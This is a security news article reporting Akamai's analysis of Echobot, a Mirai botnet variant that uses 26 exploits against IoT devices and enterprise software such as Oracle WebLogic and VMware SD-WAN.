Mirai Offspring "Echobot" Uses 26 Different Exploits

A recently discovered variant of the Mirai Internet of Things (IoT) malware uses a total of 26 different exploits for the infection phase, Akamai reports. 

Targeting improperly secured IoT devices, Mirai was first spotted in 2016 and had its source code published online in October that year. Numerous variants of the threat have emerged since, with the most recent of them targeting more processor architectures and aiming to infect devices in enterprise environments

Dubbed Echobot, the latest variant of the botnet was observed earlier this month, when it included 18 exploits, 8 of which were new to the Mirai code. The threat was also targeting a recently patched Oracle WebLogic remote code execution vulnerability (CVE-2019-2725).

Now, Akamai’s Larry Cashdollar says that a newer version of Echobot uses 26 different exploits for infection, most of which target well-known command execution vulnerabilities in various networked devices. No CVE numbers were assigned for some of the flaws, although public advisories for them had been published. 

The exploits targeted devices from ADM, Ubiquity (AirOS), ASMAX, ASUS, Belkin, Blackbot, DD-WRT, Dell, D-Link, Dreambox, Geutebruck, Hootoo, Linksys, Netgear, Nuuo, Oracle, Realtek, Seowonintech, SuperSign, Umotion, VeraLite, VMware, wePresent, WIFICAM, Yealink, and ZeroShell. 

Analysis of the malicious code revealed the inclusion of cross-application vulnerabilities, as botnet creators are no longer relying solely on devices with embedded OSes, such as routers, cameras, and DVRs. 

Enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) vulnerabilities are also targeted to infect targets and propagate the malware. At the same time, the botnet developers are targeting unpatched legacy vulnerabilities, given the inclusion of an exploit for a 10-year old flaw in ZeroShell. 

The malware’s loader system is a virtual server hosted in Bulgaria on Neterra's cloud network. The binaries, which are hosted via FTP and HTTP, were recently updated and feature file timestamps of June 7. 

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they've added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten,” Cashdollar points out. 

Related: New Mirai Variant Targets More Processor Architectures

Related: New Mirai Variant Targets Enterprise IoT Devices

view counter

Original author: Ionut Arghire